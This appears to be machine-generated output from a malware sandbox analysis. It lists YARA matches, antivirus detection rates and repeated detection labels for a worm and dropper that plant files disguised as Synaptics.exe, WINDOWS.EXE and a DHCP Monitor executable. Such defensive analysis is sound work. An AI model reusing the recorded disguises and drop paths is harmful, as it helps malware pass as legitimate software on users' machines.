            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Multi AV Scanner detection for submitted file
            Source: y8kdmHi6x3.exeVirustotal: Detection: 57%Perma Link
            Source: y8kdmHi6x3.exeMetadefender: Detection: 48%Perma Link
            Source: y8kdmHi6x3.exeReversingLabs: Detection: 81%
            Antivirus / Scanner detection for submitted sample
            Source: y8kdmHi6x3.exeAvira: detected
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMetadefender: Detection: 88%Perma Link
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 97%
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeReversingLabs: Detection: 92%
            Source: C:\ProgramData\Synaptics\Synaptics.exeMetadefender: Detection: 48%Perma Link
            Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmpMetadefender: Detection: 47%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmpReversingLabs: Detection: 71%
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exeMetadefender: Detection: 48%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeReversingLabs: Detection: 92%
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEMetadefender: Detection: 88%Perma Link
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEReversingLabs: Detection: 97%
            Machine Learning detection for sample
            Source: y8kdmHi6x3.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\WINDOWS.EXEJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\SYSTEM32.EXEJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\BNAGMGSPLO\~$cache1Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEJoe Sandbox ML: detected
            Source: 21.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.21.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 23.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.2.Synaptics.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.12.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 21.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.12.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.16.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.10.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.10.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.14.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 9.2.WINDOWS.EXE.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 9.2.WINDOWS.EXE.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 9.2.WINDOWS.EXE.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.12.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.31.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.31.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.31.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.31.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.31.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
